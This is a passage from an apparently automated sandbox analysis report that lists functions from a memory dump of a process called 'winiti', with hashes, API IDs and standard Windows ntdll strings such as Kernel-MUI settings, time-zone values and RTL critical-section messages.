                      • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                      Function 0094FED0 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                      • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                      • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                      • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                      Function 0094FE24 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                      • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                      • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                      • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                      Function 0094FFB4 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                      • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                      • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                      • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                      Function 0094FFFC Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                      • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                      • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                      • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                      Function 0094FF34 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                      • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                      • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                      • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                      Function 00978788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • Kernel-MUI-Language-Allowed, xrefs: 00978827
                      • WindowsExcludedProcs, xrefs: 009787C1
                      • Kernel-MUI-Number-Allowed, xrefs: 009787E6
                      • Kernel-MUI-Language-SKU, xrefs: 009789FC
                      • Kernel-MUI-Language-Disallowed, xrefs: 00978914
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID: _wcspbrk
                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                      • API String ID: 402402107-258546922
                      • Opcode ID: e28719b9ac9e55a38b8e3b4b7351be63a4fdd062ac6634f669eaa913cb52294c
                      • Instruction ID: 1aa689d0bdbe2e35e6529a82357ebe125fcac06d02e8fa3c01f52588cafe3b34
                      • Opcode Fuzzy Hash: e28719b9ac9e55a38b8e3b4b7351be63a4fdd062ac6634f669eaa913cb52294c
                      • Instruction Fuzzy Hash: 25F116B2D00209EFCF15DFA5C985EEEB7B9FF48300F10846AE509A7211EB359A45DB61
                      Function 009E822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID: _wcsnlen
                      • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                      • API String ID: 3628947076-1387797911
                      • Opcode ID: 0351fef104fe76d1191573711ec71b42d17da4349c98db5171141174012cc4c5
                      • Instruction ID: 797dd8c123ec13a1bc3b06b870effb025dc69f5743b1517b3a04cbc9c326e592
                      • Opcode Fuzzy Hash: 0351fef104fe76d1191573711ec71b42d17da4349c98db5171141174012cc4c5
                      • Instruction Fuzzy Hash: 66419371248789BAEB039AE2CC42FDFB76CAF45B44F100112BA08D61D1DBB0DF118BA4
                      Function 009913CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                      • API String ID: 48624451-2108815105
                      • Opcode ID: 420e2c8c7698c341b34901ebca4619531a3651aee9e7d73e5c249fde920fe72b
                      • Instruction ID: 7b42dcda49a0845d8acdd824aef4a17602c9268ebfc06ee5da0cf72f04efa294
                      • Opcode Fuzzy Hash: 420e2c8c7698c341b34901ebca4619531a3651aee9e7d73e5c249fde920fe72b
                      • Instruction Fuzzy Hash: B4612771904656AADF34DF9EC8808BEBBB9FFD8301B18C42DF49A47640D234AA44CB60
                      Function 009F3B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                      • API String ID: 48624451-2108815105
                      • Opcode ID: c1bfb8d11d1d2cd14bc386575325a396a899fc8f84aa5b3b9dba4608a7611210
                      • Instruction ID: 0d318da3e9b432b6d5c9f44a532fb172b840b460cb1f0d20f22862aa1dc856d8
                      • Opcode Fuzzy Hash: c1bfb8d11d1d2cd14bc386575325a396a899fc8f84aa5b3b9dba4608a7611210
                      • Instruction Fuzzy Hash: AF61C1B290064CABDB24DFA9C9418BE7BF9EF54311B14C52AFDED97141E238EB409B50
                      Function 00987EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                      Download Yara Rule
                      APIs
                      • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 009A3F12
                      Strings
                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 009A3EC4
                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 009A3F75
                      • Execute=1, xrefs: 009A3F5E
                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 009AE345
                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 009A3F4A
                      • ExecuteOptions, xrefs: 009A3F04
                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 009AE2FB
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID: BaseDataModuleQuery
                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                      • API String ID: 3901378454-484625025
                      • Opcode ID: e4baedfe0d445dcb49f32a7f1eb3de811c056506002522c1d49969b432d61f9e
                      • Instruction ID: ce0a10c7a9744ba75940762cdc5726fc3f7a872fae450d07c1f7de0a47803143
                      • Opcode Fuzzy Hash: e4baedfe0d445dcb49f32a7f1eb3de811c056506002522c1d49969b432d61f9e
                      • Instruction Fuzzy Hash: 9C41C831A4020C7ADF20EBD5DCC6FDAB3BCAB95705F1405A9B605A6181EA70EB458FA1
                      Function 00990B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID: __fassign
                      • String ID: .$:$:
                      • API String ID: 3965848254-2308638275
                      • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                      • Instruction ID: c25420ddcc75d8812b7bdb1aaf11f4dd9abdb8e5cf63485b3e237bc40a6d7170
                      • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                      • Instruction Fuzzy Hash: A6A1A071D0030ADFCF24CF5CC8497BEB7B8AF95315F24856AD8A2A7241E7349A81CB91
                      Function 00990554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                      Download Yara Rule
                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009B2206
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                      • API String ID: 885266447-4236105082
                      • Opcode ID: e6af5e30518601338a73e8195e75c99cc5eb28999f330ef63dbc9bfa25afd2bd
                      • Instruction ID: 9bae278fc26c2c3049b444dadc1e273a5201bef463301e39459e623b54441f4a
                      • Opcode Fuzzy Hash: e6af5e30518601338a73e8195e75c99cc5eb28999f330ef63dbc9bfa25afd2bd
                      • Instruction Fuzzy Hash: C05137317442016FEB15CB19CC82FA633ADEBD4725F218229FD59DF285DA31EC828B90
                      Function 009914C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                      Download Yara Rule
                      APIs
                      • ___swprintf_l.LIBCMT ref: 009BEA22
                        • Part of subcall function 009913CB: ___swprintf_l.LIBCMT ref: 0099146B
                        • Part of subcall function 009913CB: ___swprintf_l.LIBCMT ref: 00991490
                      • ___swprintf_l.LIBCMT ref: 0099156D
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: %%%u$]:%u
                      • API String ID: 48624451-3050659472
                      • Opcode ID: 2b4d75e715357200838e301fb6025e603f26c7bbc6c214ac4444dab21ef146d2
                      • Instruction ID: f2cbd7dd39508b542c75f5ad5c3cbe0b92ca524cec0bdfd409af0fd2f96f7965
                      • Opcode Fuzzy Hash: 2b4d75e715357200838e301fb6025e603f26c7bbc6c214ac4444dab21ef146d2
                      • Instruction Fuzzy Hash: 9821C17290021A9BCF21EE58CC41AEAB3BCBB90710F564451FC46D3240DB74EE588BE2
                      Function 009F3DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: %%%u$]:%u
                      • API String ID: 48624451-3050659472
                      • Opcode ID: d5b6b734d222668cbd708e30b35a67b8cbf89d6d49e7383ae45b937b5d27f429
                      • Instruction ID: d873309b255f86cf9953525f6605efdb5240ce73e62bedfb4e31742ad44761b1
                      • Opcode Fuzzy Hash: d5b6b734d222668cbd708e30b35a67b8cbf89d6d49e7383ae45b937b5d27f429
                      • Instruction Fuzzy Hash: 3121CF7290022EABCB20AE69DC459FF77AC9F54758F048521FD0993281E7789F4887E1
                      Function 009753A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                      Download Yara Rule
                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009B22F4
                      Strings
                      • RTL: Resource at %p, xrefs: 009B230B
                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009B22FC
                      • RTL: Re-Waiting, xrefs: 009B2328
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                      • API String ID: 885266447-871070163
                      • Opcode ID: b0e2a2f7ffed5b011c28f9dd62406f92a7812c3dc8c00195c2b138f377b2b1c8
                      • Instruction ID: 15d4b2e25242f53a4247ddec77f253f6f938b02b6652e7d0b419c09ece645af3
                      • Opcode Fuzzy Hash: b0e2a2f7ffed5b011c28f9dd62406f92a7812c3dc8c00195c2b138f377b2b1c8
                      • Instruction Fuzzy Hash: 21512A72600701ABEF15DF68CC81FA673DCEF94764F118629FD18DB291E6A1ED418790
                      Function 0097EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                      Download Yara Rule
                      Strings
                      • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009B24BD
                      • RTL: Re-Waiting, xrefs: 009B24FA
                      • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 009B248D
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                      • API String ID: 0-3177188983
                      • Opcode ID: d3b53fc1975c46a1dd6f7e8db857e33980db99a23e04a5fe0722f3bdd2f21b26
                      • Instruction ID: a2559d575a14255ae1455952f20b5b4d47aa3f11a103e29090c0a3f197c15ee6
                      • Opcode Fuzzy Hash: d3b53fc1975c46a1dd6f7e8db857e33980db99a23e04a5fe0722f3bdd2f21b26
